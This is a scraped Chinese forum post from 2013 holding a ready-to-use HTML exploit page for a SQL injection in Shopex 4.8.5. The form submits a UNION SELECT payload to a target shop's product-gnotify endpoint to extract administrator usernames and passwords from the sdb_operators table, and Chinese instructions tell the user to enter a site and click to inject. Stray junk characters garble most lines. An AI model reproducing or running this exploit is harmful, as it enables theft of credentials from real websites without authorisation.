<center>
; x" g5 x/ s3 y/ I' Z, q q7 V<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title># _- \: V& l S7 o7 `" W
<form action="" method="post" name="submit_url">
( Q/ L& I1 [! G网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>0 `' l2 m6 G: A Q* P7 y/ n8 O7 h0 D
<input type="hidden" name="goods[goods_id]" value="3">- z8 `6 [# ^9 U* {' X) i
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">) |# ?2 A% i* Q8 r$ O9 a- X
<input type="submit" value="给我注入" onclick=fsubmit()>
! D, p& `( z- |</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com1 L) d7 S( d0 n. z% b1 p; R) ?
& v$ q5 o! ^3 @- z2 G$ r d<script> 1 h* q* @0 q% a, b
function fsubmit(){ 0 B) h* h' u5 e9 Q0 C
form = document.forms[0]; 1 g7 d$ {: A' `# w0 }. O
form.action = form.url.value+'/?product-gnotify'; ) Y; s! u7 v- c( U
form.submit(); ; I% e/ P* Y1 }' d8 N9 H1 m2 _' ]/ S
} : d* `6 V+ T" `5 T
</script>7 B3 d6 j) l7 g; J& R1 a9 k: c- Z
|
发表于 2013-1-23 09:20:52
收藏
支持
反对